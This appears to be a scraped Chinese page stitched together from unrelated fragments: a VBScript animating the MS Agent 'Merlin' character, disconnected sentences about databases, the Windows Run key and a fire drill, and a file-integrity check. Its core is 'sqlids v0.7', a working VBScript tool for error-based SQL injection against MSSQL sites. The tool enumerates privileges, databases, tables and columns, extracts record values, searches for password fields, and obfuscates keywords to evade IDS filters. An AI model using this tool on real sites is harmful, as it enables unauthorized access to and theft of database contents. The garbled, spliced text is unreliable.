数据库的每个拷贝称为一个复本，并且每个复本都包含一个公共的表、查询、窗体、报表、宏和模块的集合；每个复本还可以包含只在本地计算机上使用的本地对象'On Error Resume Next strAgentName="Merlin" strAgentPath="c:\windows\msagent\chars" & strAgentName & ".acs" ScriptComplete=0 Set objAgent=WScript.CreateObject("Agent.Control.2","agent_") objAgent.Connected=True objAgent.Characters.Load strAgentName, strAgentPath Set objCharacter=objAgent.Characters(strAgentName) objCharacter.LanguageID=&H409 'objCharacter.LanguageID=&H804 '菜单为中文，但微软没有开发中文语音 objCharacter.MoveTo 0, 700 objCharacter.Show objCharacter.GestureAt 900, 700 wsh.sleep 2000 objCharacter.MoveTo 900, 700 wsh.sleep 3000 objCharacter.GestureAt 900, 100 wsh.sleep 2000 objCharacter.MoveTo 900, 100 wsh.sleep 3000 objCharacter.Speak("Good " & GetTimeOfDay()) objCharacter.Speak("I love you") objCharacter.speak("Hello, how are you?") objCharacter.speak("I will show for you!") wsh.sleep 10000 '边表演边说明 show "Acknowledge", "点头" show "Alert", "伸直并抬起眉毛" show "Announce", "举起喇叭并吹奏" show "Blink", "眨眼睛" show "Confused", "挠头" show "Congratulate", "展示奖品" show "Congratulate_2", "鼓掌" show "Decline", "抬起手并摇头" show "DoMagic1", "举起魔法棍" show "DoMagic2", "放下魔法棍，出现云彩" show "DontRecognize", "捂住耳朵" show "Explain", "将两臂向两侧展开" show "GestureDown", "向下的手势" show "GestureLeft", "向左的手势" show "GestureRight", "向右的手势" show "GestureUp", "向上的手势" show "GetAttention", "向前倾并敲击" show "GetAttentionContinued", "向前倾并再次敲击" show "GetAttentionReturn", "返回正常姿势" ShowLoop "Hearing_1", "耳朵伸长（循环的动画）" ShowLoop "Hearing_2", "头向左倾（循环的动画）" ShowLoop "Hearing_3", "头向左转（循环的动画）" ShowLoop "Hearing_4", "头向右转（循环的动画）" show "Hide", "消失在帽子下面" show "Idle1_1", "喘口气" show "Idle1_2", "向左看并眨眼" show "Idle1_3", "向右看" show "Idle1_4", "从上往右看并眨眼" show "Idle2_1", "看看魔法棍并眨眼" show "Idle2_2", "手握手并眨眼" show "Idle3_1", "打呵欠" ShowLoop "Idle3_2", "入睡（循环的动画）" show "LookDown", "向下看" show "LookDownBlink", "眨眼向下看" show "LookDownReturn", "返回正常姿势" show "LookLeft", "向左看" show "LookLeftBlink", "眨眼向左看" show "LookLeftReturn", "返回正常姿势" show "LookRight", "向右看" show "LookRightBlink", "眨眼向右看" show "LookRightReturn", "返回正常姿势" show "LookUp", "向上看" show "LookUpBlink", "眨眼向上看" show "LookUpReturn", "返回正常姿势" show "MoveDown", "向下飞行" show "MoveLeft", "向左飞行" show "MoveRight", "向右飞行" show "MoveUp", "向上飞行" show "Pleased", "微笑并把手合在一起" show "Process", "搅拌大锅" ShowLoop "Processing", "搅拌大锅（循环的动画）" show "Read", "打开书，阅读并查寻" show "ReadContinued", "阅读并查寻" show "ReadReturn", "返回正常姿势" ShowLoop "Reading", "阅读（循环的动画）" show "RestPose", "正常姿势" show "Sad", "悲伤的表情" show "Search", "观察水晶球" ShowLoop "Searching", "观察水晶球（循环的动画）" show "Show", "从帽子中出现" show "StartListening", "手靠向耳朵" show "StopListening", "手捂在耳朵上" show "Suggest", "显示电灯泡" show "Surprised", "显得很吃惊" show "Think", "用手托住下巴向上看" ShowLoop "Thinking", "用手托住下巴向上看（循环的动画）" show "Uncertain", "向前倾并抬起眉毛" show "Wave", "摆手" show "Write", "打开书，书写并查寻" show "WriteContinued", "书写并查寻" show "WriteReturn", "返回正常姿势" ShowLoop "Writing", "书写（循环的动画）" actions=Array("Acknowledge","Alert","Announce","Blink","Confused","Congratulate","Congratulate_2","Decline","DoMagic1","DoMagic2","DontRecognize","Explain","GestureDown","GestureLeft","GestureRight","GestureUp","GetAttention","GetAttentionContinued","GetAttentionReturn","Hide","Idle1_1","Idle1_2","Idle1_3","Idle1_4","Idle2_1","Idle2_2","Idle3_1","LookDown","LookDownBlink","LookDownReturn","LookLeft","LookLeftBlink","LookLeftReturn","LookRight","LookRightBlink","LookRightReturn","LookUp","LookUpBlink","LookUpReturn","MoveDown","MoveLeft","MoveRight","MoveUp","Pleased","Process","Read","ReadContinued","ReadReturn","RestPose","Sad","Search","Show","StartListening","StopListening","Suggest","Surprised","Think","Uncertain","Wave","Write","WriteContinued","WriteReturn") '顺序表演 for each action in actions Set objRequest=objCharacter.Play(action) Do While objRequest.Status > 0 WScript.Sleep 100 Loop next '随机表演 do Randomize i=Int((UBound(actions) + 1) * Rnd) action=actions(i) Set objRequest=objCharacter.Play(action) Do While objRequest.Status > 0 WScript.Sleep 100 Loop loop Do WScript.Sleep 1000 Loop Until ScriptComplete Function GetTimeOfDay() h=Hour(Now) If h < 12 Then TimeOfDay="Morning" ElseIf h < 18 Then TimeOfDay="Afternoon" Else TimeOfDay="Evening" End If GetTimeOfDay=TimeOfDay End Function Sub Show(action,prompt) objCharacter.Speak(action) wsh.sleep 300 objCharacter.Think(prompt) wsh.sleep 200 Set objRequest=objCharacter.Play(action) Do While objRequest.Status > 0 WScript.Sleep 100 Loop end sub Sub ShowLoop(action,prompt) objCharacter.Speak(action) objCharacter.Think(prompt) objCharacter.Play(action) wsh.sleep 5000 objCharacter.stop end sub Sub agent_dblclick(ByVal CharacterID, ByVal Button, ByVal Shift, ByVal X, ByVal Y) if MsgBox("确定要退出吗？",33,"确认退出")-2 then objCharacter.StopAll WScript.Quit end if End Sub Sub agent_DragStart(ByVal CharacterID, ByVal Button, ByVal Shift, ByVal X, ByVal Y) objCharacter.Speak("Shit! Don't drag me!") wsh.sleep 5000 End Sub

现在，我们知道您正在想什么就是说，如果HierarchicalFlexGrid被绑定到一个分层结构的Command，那么显示出的数据带区将是水平排列的，每个带区中包含一列，分别对应于Recordset中的每一个字段

set arg=wscript.arguments If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then Wscript.Quit End If if arg.count=0 then usage() Wscript.Quit End If Sub usage() wsh.echo string(79,"*") wsh.echo "暂且只支持mssql显错模式，直接写url为数字型，写url'为字符型,url里有&请用双引号包含url" wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" wsh.echo "以下两个脚本可互相参考" wsh.echo "" wsh.echo "" wsh.echo "Usage:" wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs limit" wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs dbname" wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs table master" wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs id=1 filed master spt_server_info" wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs id=1 result id master sysinfo" wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs search pass" wsh.echo string(79,"*")&vbcrlf end Sub Function getHTTPPage(Path) t=GetBody(Path) getHTTPPage=BytesToBstr(t, "GB2312") End Function Function UrlEncode(str) str=Replace(str," ","%20") UrlEncode=str End Function Function GetBody(url)' xml得到网页源码，可以改成cookie或get提交 On Error Resume Next Aurl=Split(url,"?") '这是为post提交的 Set Retrieval=CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "post", Aurl(0), False, "", "" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Accept-Encoding", "gzip, deflate" .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" .setRequestHeader "Connection", "Keep-Alive" .setRequestHeader "Cache-Control", "no-cache" .Send UrlEncode(Aurl(1)) 'post提交 GetBody=.ResponseBody .abort End With Set Retrieval=Nothing End Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream=CreateObject("adodb.stream") objstream.Type=1 objstream.Mode=3 objstream.Open objstream.Write Body objstream.Position=0 objstream.Type=2 objstream.Charset=Cset BytesToBstr=objstream.ReadTExt objstream.Close Set objstream=Nothing End Function Function ReplaceKeyWord(Value)'绕过ids过虑 Table="select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- >shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| [k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] |sp_->s%p_|[k]|and->a%nd" Dim i, Relpacement, Temp Relpacement=Split(Table, "|[k]|") ReplaceKeyWord=Value For i=0 to UBound(Relpacement) Temp=Split(Relpacement(i), "->") If UBound(Temp)=1 Then ReplaceKeyWord=Replace(ReplaceKeyWord, Temp(0), Temp(1)) NExt End Function Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容，用正则帅一点，可惜不太会 aHTML=Split(sHTMLTEMP, "varchar") If(UBound(aHTML) > 0)Then sHTMLTEMP=aHTML(1) aHTML=Split(sHTMLTEMP, "'") sHTMLTEMP=aHTML(1) End If result=sHTMLTEMP End Function Function Str2HEx(strHEx)'sql的16进制转换函数 Dim sHEx For i=1 To Len(strHEx) sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00" NExt Str2HEx="0x"&sHEx End Function Function Str2HExtwo(strHEx)'sql的16进制转换函数 Dim sHEx For i=1 To Len(strHEx) sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1))) NExt Str2HExtwo="0x"&sHEx End Function Function MoveR(Rstr) '去重复 Dim i,SpStr SpStr=Split(Rstr,",") For i=0 To Ubound(Spstr) If I=0 then MoveR=MoveR & SpStr(i) & "," Else If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then MoveR=MoveR & SpStr(i) Elseif instr(MoveR,SpStr(i))=0 Then MoveR=MoveR & SpStr(i) & "," End If End If NExt End Function function page(sql) page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"") End Function url=arg(0) injection=arg(1) '--------------------------------------以下代码是注入语句，完全不需要引号 select case arg(1) Case "limit" body=Replace(getHTTPPage(url),Chr(34),"") '语句单独提出来，方便以后修改，第一条是sa，第二条是DB_owner sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" Bodyone=page(sqlone) bodytwo=page(sqltwo) wsh.echo "当前信息：" If Len(body)=Len(Bodyone) Then wsh.echo "SA" If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then wsh.echo "DB_owner" Else wsh.echo "PUBLIC" End If sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--" rtemp=Split(sqlthtree,"|") servername=result(page(rtemp(0))) version=result(page(rtemp(1))) user=result(page(rtemp(2))) db_name=result(page(rtemp(3))) wsh.echo "servername:"&servername wsh.echo "version:"&version wsh.echo "user:"& user wsh.echo "db_name:"& db_name case "dbname" i=1 Do sql="and db_name("&i&")>0--" '暴库名语句 Body=page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "table" i=1 Do ' 表名语句 agr(2)表示库 sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))--" Body=page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "filed" sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0-- " biaoid=result(page(sqlbiaoid)) biaoid=Replace(biaoid,Chr(124),"") sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- " k=Replace(result(page(sqlclounmcnt)),Chr(94),"") wsh.echo "共有列名"&k&"个" For i=1 To k sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&" order by colid) t order by colid desc)=0--" wsh.echo result(page(sqlfiled)) nExt case "result" i=1 sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句 k=result(page(sqlcloum)) k=Replace(k,Chr(94),"") wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf For i=1 To k sqlneirong="an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4) &"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--" Body=page(sqlneirong) wscript.echo Replace(result(body),Chr(94),"") Next Case "search" love=Str2HExtwo(arg(2)) wscript.echo "请稍候，正在查循，暂且只列10条，结果显示为'表名|字段名'格式" TimeSpend=Timer For i=1 To 10 '可以根据需要改动这个10 sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--" Body=page(sqlsearch) body=result(body) a=a&body&"," NExt TimeSpend=round(Timer - TimeSpend,2) wsh.echo MoveR(a) wsh.echo "用时:" & TimeSpend & "秒." Case Else If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then wscript.echo "注意参数" usage() End if end select 以上代码在VB4/32，VB5中实现

） 由于您对Run项感兴趣，因此我们假定您真正想知道的是如何找出哪些程序被配置为在每次Windows启动时自动运行也可以将数字包含在引号("")中使其成为字符串

'验证字符：fastslz file=Wscript.ScriptFullName Dim slz set slz=CreateObject("Adodb.Stream") slz.Type=1 slz.Mode=3 slz.Open slz.Position=0 slz.Loadfromfile file Bin=slz.read(18) if AscB(MidB(Bin,12,1))=&H66 and AscB(MidB(Bin,13,1))=&H61 and AscB(MidB(Bin,14,1))=&H73 and AscB(MidB(Bin,15,1))=&H74 and AscB(MidB(Bin,16,1))=&H73 and AscB(MidB(Bin,17,1))=&H6C and AscB(MidB(Bin,18,1))=&H7A Then WScript.echo "通过验证" else WScript.echo "非法修改" end if 医院科室消防演练但这里，我们采用后一种措施Ans=InPutBox("请输入要执行的操作：1.加密，2.解密,3.退出。